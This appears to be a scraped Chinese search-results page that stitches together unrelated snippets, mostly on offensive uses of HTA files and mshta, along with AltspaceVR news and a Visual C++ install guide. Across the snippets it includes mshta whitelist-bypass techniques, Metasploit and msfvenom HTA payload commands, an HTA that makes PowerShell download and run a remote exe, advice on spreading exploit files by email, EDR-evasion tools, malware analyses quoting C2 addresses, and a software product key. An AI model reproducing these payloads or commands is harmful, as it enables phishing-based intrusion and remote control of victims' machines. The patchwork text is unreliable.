HTA文件在网络安全领域内广为人知,从红队和蓝队的角度来看,它是绕过应用程序白名单有价值的“古老”方式之一。...运行Microsoft HTML应用程序主机的Mshta.exe,Windows OS实用程序负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。...此模块承载一个HTML应用程序(HTA),打开时将通过PowerShell运行有效负载。当用户打开HTA文件时,IE会在执行exploit之前提示用户两次。...当执行上述命令时,您将在multi/handler中激活会话。...攻击者可以使用Web技术为Windows操作系统创建恶意应用程序来克隆站点。简而言之,它通过HTA文件执行PowerShell注入,可以通过浏览器用于基于Windows的PowerShell开发。
今天,我们将学习有关HTA攻击的不同方法。HTA是有用且重要的攻击,因为它可以绕过应用程序白名单。...从红色分组和蓝色分组的角度来看,HTA文件在网络安全领域是众所周知的,是绕过应用程序白名单的有价值的“复古”方法之一。...Mshta.exe运行Microsoft HTML应用程序主机,这是Windows OS实用程序,负责运行 HTA(HTML应用程序)文件。...该模块托管一个HTML应用程序(HTA),该应用程序在打开时将通过Powershell运行有效负载。当用户导航到HTA文件时,IE将在执行有效负载之前两次提示它们。...执行上述命令后,您将在多重/处理器中激活您的会话。
这是一个可以让黑客欣喜若狂的新漏洞,一旦该漏洞被激活,就会有大量计算机成为黑客手中的肉鸡,被人远程控制不可避免…… 微软的Windows操作系统在进行了短暂的“喘息”后,近日又在攻击爱好者不懈努力下...安全公告牌 MSHTA即HTA,此处的MS主要用于强调这是微软的漏洞,HTA全名为HTML Application,就是HTML应用程序,其实只要简单地用“hta”为扩展名保存HTML页面就算创建了一个...当我们成功激活被攻击计算机上的Windows MSHTA脚本执行漏洞后,该计算机就会自动下载我们设置的服务端程序,我们即可对它进行远程控制操作。 ...“Usage:C:2005016.exe htafilename savefilename”,该语句的含义是可通过利用工具将一个HTA文件转化为一个可以成功利用Windows MSHTA脚本执行漏洞的文件...利用漏洞的恶意文件生成之后,你就可通过各种各样的方法将它传播出去,例如藏在电子邮件的附件中、通过即时通讯软件发给别人、在论坛上发帖等。
首批工具包Campfire、Alien Planet的功能主要如下: 为朋友及社区创建虚拟的活动空间(可自定义名称); 创建Campfire和Alien Planet的自定义版本(空间中可轻松拖放物体...Worlds >>; 选择>开始构建新世界; 为所在世界命名,添加个人资料、图片,并选择一个起始环境(模板包括Base Worlds和SDK Playground Worlds),以对虚拟空间进行自定义...; 进入虚拟世界后,单击>以激活仪表板。...而作为混合现实内容跨平台努力的一部分,微软让用户通过桌面或移动应用程序,也能直接访问所有AltspaceVR的场所和体验。...而后期若要在虚拟空间中提供更多可扩展的基础设施,则取决于技术的进一步发展和消费者的需求。 ?
A)启用设置 在此 EDR 中,使用“标准保护策略”激活“恶意脚本阻止”功能。 B)CPL-HTA 两次攻击都被挡住了。...因此选择执行相同的攻击,但使用不同的应用程序。事实上,问题似乎出在特定的应用程序上,所以一旦使用了另一个应用程序但技术相同,攻击就成功了。...B)CPL-HTA-EXE-DLL 所有攻击向量都通过了,EDR 没有发出任何警报。...其理念是成为一个成熟的 ring 3 rootkit,具有应用程序控制功能和通过右键单击过程自定义白名单来防止误报。...本研究使用了一个合法且签名的驱动程序,该驱动程序易受攻击,并且通过利用它,可以访问内核并加载自定义的未签名驱动程序。
,翻译过来就是HTML应用程序,你只要简单的用.hta为扩展名保存HTML页面就算创建了一个HTA文件,下面我们就用HTA来编个窗口,将以下这段代码保存为.hta文件,然后再用浏览器打开,会发现什么?...:APPLICATION标签,这就是关键之处,hta通过它来提供一系列面向应用程序的功能,接下来再讲一讲它的属性(我的头又在发胀) APPLICATIONNAME属性(applicationName)...ICON属性(icon) 此属性为设置应用程序的图标。 MAXIMIZEBUTTON属性(maximizeButton) 此属性为设置是否在HTA窗口中显示最大化按钮,默认值为 yes。...SYSMENU属性(sysMenu) 此属性为设置是否在HTA窗口中显示系统菜单,默认值为 yes。 VERSION属性(version) 此属性为设置应用程序的版本,默认值为空。...此外,在脚本中还可以使用commandLine属性来检索应用程序启动时的参数。 在HTA中还可以继续使用html中的绝大多数标签、脚本等。
其成因是Microsoft PowerPoint执行时会初始化Script Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component...https://github.com/bhdresh/CVE-2017-0199 demiguise 这是一个 HTA 加密工具,并且可以将经过加密的 HTA 文件包含在 html 里。...Windows 提供了应用程序间数据传输的若干种方法。其中一种就是使用动态数据交换(DDE)协议。 DDE 协议是一套消息和指示的集合。通过发送消息以及共享内存实现应用程序的数据共享和交换。...它可用于将 shellcode 注入本机 Windows 应用程序(仅限于 32 位应用程序)。shellcode 可以是你自己写的或者通过框架生成的,比如Metasploit。...://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL The Backdoor Factory (BDF) 这个工具可以二进制文件打补丁,将自定义的
该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。...复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开 或者IE浏览器打开 http://192.168.0.116:8080 即可获得会话 自定义下载者...1.构造HTA文件,当访问hta文件就会触发powershell下载文件至临时目录执行 准备你的xx.exe文件上传至站点目录,假如得到地址 http://xxx.com/xxx.exe ?...HTA代码: a=new ActiveXObject("WScript.Shell"); a.run('%SystemRoot%/system32/WindowsPowerShell/...='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86 ?
load---> 恶意代码 实践 2.1 白名单Msbuild.exe MSBuild 是 Microsoft Build Engine 的缩写,而Microsoft Build Engine是用于构建应用程序的平台...,它为项目文件提供XML模式,该文件控制构建平台如何处理和构建软件,通过微软的官方介绍来看,Msbuild.exe可以通过项目xml文件来构建,这也是关键。...但是通过代码分析来看,也仅仅只是base64编码了一下,加密强度很低,那么自己可以再去改改加密的方式强度。...所以只能到 C:\Windows\Microsoft.NET\下执行查找文件命令: dir /S Installutil.exe 第二步安装GreatSCT工具 GreatSCT可以基于Metasploit、自定义...路径: C:\Windows\System32\url.dll C:\Windows\SysWOW64\url.dll 第一步生成恶意hta文件,就不多说了 第二步通过rundll32.exe 加载url.dll
通过研究,发现可以使用 DHTML 中的 Image 对象来达到我们的目的,Image 对象可动态装载指定的图片,通过读取其 width 和 height 属性即能获得装入图片的大小,以此来设置弹出窗口的大小...以上代码在IE 5.x-6.0中测试通过。...九、 比较灵活的HTA窗口 我简单介绍一下,HTA的全名为HTML Application,翻译过来就是HTML应用程序,你只要简单的用.hta为扩展名保存HTML页面就算创建了一个HTA文件,下面我们就用...:APPLICATION标签,这就是关键之处,hta通过它来提供一系列面向应用程序的功能,接下来再讲一讲它的属性(我的头又在发胀) APPLICATIONNAME属性(applicationName...此外,在脚本中还可以使用commandLine属性来检索应用程序启动时的参数。 在HTA中还可以继续使用html中的绝大多数标签、脚本等。
但新的考试要求已经改为Microsoft Visual C++ 2010学习版,很多同学还不熟悉这个软件,不知道怎么操作,之前介绍的旗舰版也稍有差别,而且软件需要激活。...双击打开 Setup.hta,如下图,选择Visual C++ 2010学习版,点击出现提示点 是。 ? ? 按照提示,等待,点击下一步 安装。时间可能会比较长,请耐心等待。...当然也可以直接输入密钥 6VPJ7-H3CXH-HBTPT-X4T74-3YVY7 ,点击立即注册激活。网上注册后邮箱收到的密钥和这个是一样的,所以没必要联机获取。 四、如何使用 ?...选择 Win32 控制台应用程序,下方根据要求选择文件保存的位置和解决方案(项目、project)名称,然后点 确定---下一步。 ? ? 再次确认,控制台应用程序、空项目,然后点 完成 。 ?...然后点击出现的工具右边--添加或移除按钮--自定义。 ? 添加命令--调试--开始执行。添加好,确定--关闭。 ?
文章前言 HTA是指HTML Application,它是一种基于HTML和JavaScript的Windows应用程序格式。...HTA文件扩展名为".hta",在Windows系统中可以像其他可执行文件一样运行。...HTA文件使用Internet Explorer作为其渲染引擎并具有访问本地计算机资源的权限,因此可以执行许多强大的操作,包括读写本地文件、调用系统命令等。...由于这些功能,HTA文件也可能被恶意软件利用进行攻击。...Step 5:成功返回会话 文末小结 本篇文章我们介绍了HTA钓鱼的基本流程,在实战中可以通过社交软件或者邮件的方式发送给受害者用户进行执行并获取权限
可以将 shellcode 注入 explorer、notepad 或其他自定义程序,免杀效果还算可以,能过 360 杀毒和火绒动态和静态检测,瑞星静态查杀也可通过。...Magic Unicorn 支持 cobalt strike、Metasploit 和自定义的 shellcode。...Unicorn 使用比较简单,可以生成 powershell 代码、macro 宏代码、hta、dde 等格式的 payload 文件,可以在社工时直接使用,不过因为生成的代码关键字比较明显,所以静态查杀很多都没通过...2、Msbuild.exe:Microsoft Build Engine 是一个用于构建应用程序的平台。这个引擎,也称为 MSBuild。...3、Mshta.exe:Mshta.exe 运行 Microsoft HTML 应用程序,Windows OS 实用程序负责运行 HTA(HTML 应用程序)文件。
目前,Spora主要通过邮件欺骗俄罗斯用户,它把邮件内容伪装成是1C(在俄罗斯和很多前苏联国家中十分流行的会计软件)的发票。...出自1C.a01e743_pdf.hta”,这里利用两个扩展名的方式试图欺骗用户这是一个PDF格式的发票,但实际是HTA文件。...HTA文件即HTML应用程序,它允许任何人都能用HTML和各种脚本语言编写桌面应用程序。就好比你的浏览器没有能够防止网站篡改系统的安全机制。...HTML应用程序在Windows上支持的两种脚本语言是JScript和VBScript,两者均在Spora中被使用。...最后执行JScript文件: HTA下载器的内容 JScript是加密的、模糊化的,能够防止利用自定义算法和CryptoJS的检测。
银角大王 HTA hta格式,看上去一个陌生的后缀,但实际遨游网络的你天天都接触到,因为它也是网页格式的一种,类似于html/htm ,通过html语法编写内容。...总的说,HTA是个披着web外衣的exe应用程序,要是加上Powershell……嘿嘿嘿 :P (没有挖0day的技术,就放飞你的思路。)...在实例hello.hta中的 是HTA的一些参数设置,设置详情见之前HTA相关内容链接。 已然有了HTA的完美辅助,如果加上Powershell的暴力输出呢?...lport=8081 -f hta-psh -o test.hta 生成的脚本内容经过base64encode加密,想学习的同学可以把base64部分还原,观察编写语法。...“ (理论上可以通过标签来控制图标的,不知为何测试不成功。)
【执行混淆代码】 【通过 MSHTA 执行远程服务器上的 HTA 文件】 HTA 文件包含多个千余行的垃圾 VBS 函数,其中只有一个与恶意行为有关。...该脚本将 [ENTER] 按键发送到活动的窗口应用程序,以便使用 SendKeys.SendWait() 函数自动执行。...通过命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta来执行远程 HTA 文件。...通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件,如下所示。...【通过 LNK 执行 HTA 文件】 MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。
ScareCrow ScareCrow是一款功能强大的Payload创建框架,可以帮助广大研究人员生成用于向合法Windows金册灰姑娘中注入内容的加载器,以绕过应用程序白名单控制。...这些自定义系统调用还用于执行VirtualProtect调用,以移除由EDR放置的钩子(如上所述),从而避免被任何EDR的防篡改控件检测到。...这是通过调用VirtualProtect系统调用的自定义版本NtProtectVirtualMemory来完成的。...如果需要,还可以通过有效的命令行选项来使用自己的代码签名证书。...(default "dll") -O string Name of output file (e.g. loader.js or loader.hta).
攻击详情 该攻击被印度网络安全公司Quick Heal称为“ Operation SideCopy ” ,其攻击源于一个先进的持久威胁(APT)小组,该组织通过“复制”其他黑客攻击行为者(例如SideWinder...攻击锁定 利用Microsoft公式编辑器缺陷 该攻击活动的起点是带有嵌入式恶意附件的电子邮件(以包含LNK文件或Microsoft Word文档的ZIP文件的形式),该电子邮件通过一系列下载最终以有效负载的形式来触发感染链...一旦打开,LNK文件就会滥用“ mshta.exe ”来执行在欺诈性网站上托管的恶意HTA(Microsoft HTML应用程序的缩写)文件,而HTA文件是使用称为CACTUSTORCH的开源有效负载生成工具...多阶段恶意软件分发过程 第一阶段的HTA文件包含诱饵文档和执行该文档并下载第二阶段的HTA文件的恶意.NET模块,第二阶段的HTA文件又会在复制Microsoft的凭据还原和恢复实用程序之前检查是否存在流行的防病毒解决方案...研究人员说:“该DUser.dll将通过TCP端口6102端口向IP地址'173.212.224.110'发起连接。” “一旦连接成功,它将根据从C2收到的命令继续执行各种操作。
hta文件,之后通过目标主机的mshta来远程下载并执行,例如在本地创建以下hta文件: <meta http-equiv="Content-Type" content="text/html...之后在cmd下<em>通过</em>mshta来下载<em>hta</em>文件并运行,使其上线,且无文件落地: mshta http://192.168.174.131:1234/evil.<em>hta</em> ? CS中成功上线: ?...Wget下载地址:https://eternallybored.org/misc/wget/ 当目标主机上有安装wget时,我们可以直接<em>通过</em>该<em>应用程序</em>来实现远程文件下载: ?...<em>应用程序</em> wget wget 是一个从网络上自动下载文件的自由工具,支持<em>通过</em> HTTP、HTTPS、FTP 三个最常见的 TCP/IP协议下载,并可以使用HTTP 代理。"...当目标主机上有安装wget时,我们可以直接通过该应用程序来实现远程文件下载: wget http://192.168.174.1:1234/evil.sh ?
领取专属 10元无门槛券
手把手带您无忧上云